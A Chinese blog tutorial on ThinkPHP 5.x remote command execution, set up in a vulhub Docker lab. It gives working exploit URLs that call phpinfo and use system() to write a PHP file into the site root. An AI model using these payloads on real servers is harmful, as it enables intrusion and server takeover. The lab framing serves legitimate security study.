当前位置: 首页 > article >正文

常⻅框架漏洞--ThinkPHP

Thinkphp5x远程命令执⾏及getshell

环境搭建

cd vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

访问网址

漏洞利⽤

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

根⽬录⽣成1.php ⽂件,输出phpinfo
另一种方法,直接工具操作

http://www.kler.cn/a/599659.html

相关文章:

  • Linux驱动开发-①platform平台②MISC字符驱动框架③input框架
  • RAG(Retrieval-Augmented Generation)基建之PDF解析的“魔法”与“陷阱”
  • python打包辅助工具
  • GNSS(GPS、北斗等)与UWB的融合定位例程,matlab,二维平面,使用卡尔曼滤波
  • docker-dockerfile书写
  • Elasticsearch 面试备战指南
  • Siri接入DeepSeek快捷指令
  • JAVA小项目:拼图游戏(简单易懂可上手)
  • 6.1、认证技术基础与原理
  • 基于CentOS系统搭建Samba服务
  • 【第21章】亿级电商订单系统架构-详细设计
  • 常见框架漏洞—Shiro
  • 【大模型LLM第十四篇】Agent学习之anthropic-quickstarts Agent
  • Lisp语言的学习路线
  • 使用现有三自变量和腐蚀速率数据拟合高精度模型,并进行预测和自变量贡献度分析的一般步骤
  • 聊聊langchain4j的HTTP Client
  • 力扣刷题78. 子集
  • python 中match...case 和 C switch case区别
  • 前端传来的不同类型参数,后端 SpringMVC 怎么接收?
  • 【Unity Shader编程】之透明物体渲染